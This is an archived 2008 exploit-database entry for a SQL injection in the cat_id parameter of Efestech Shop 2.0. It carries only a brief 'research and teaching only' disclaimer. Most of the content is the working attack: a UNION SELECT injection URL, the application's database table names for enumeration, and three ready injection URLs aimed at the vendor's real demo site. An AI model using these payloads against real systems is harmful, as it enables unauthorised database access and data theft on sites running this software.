Efestech Shop 2.0 (cat_id) Remote SQL Injection Vulnerability
发布时间(Published):2008-07-01
SBEUGID:SEBUG-20080724005
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Title: Efestech Shop v2.0 Sql İnjection Vuln



==============================

==================================



[+] Author : Dr.Kacak

[+] Special Thankz : KnockOut And All My Friends

[+] System 0VerfL0WerZ Group & BuqX Team

[+] Mail : BuqX [at] Hotmail [dot] com



=================================================================



Script : Efestech Shop v2.0

Verz: 2.0

Download : http://www.aspindir.com/indir/5479



 



SQL attack ;



http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar



Tables;



ayarlar

cat_eng

cat_tr

eng

lisans

mark_eng

mark_tr

product

subcat_eng

subcat_tr

tr

urun_resim



 



###############################################################



Example Bug Site :



http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar

http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng

http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr
// Sebug.net [ 2008-07-02 ]

Home | Submit Info | Lib | Help | Forum | Partners
Copyright © 2006-2008 SEBUG Security Database. All rights Reserved
鄂ICP备05024839号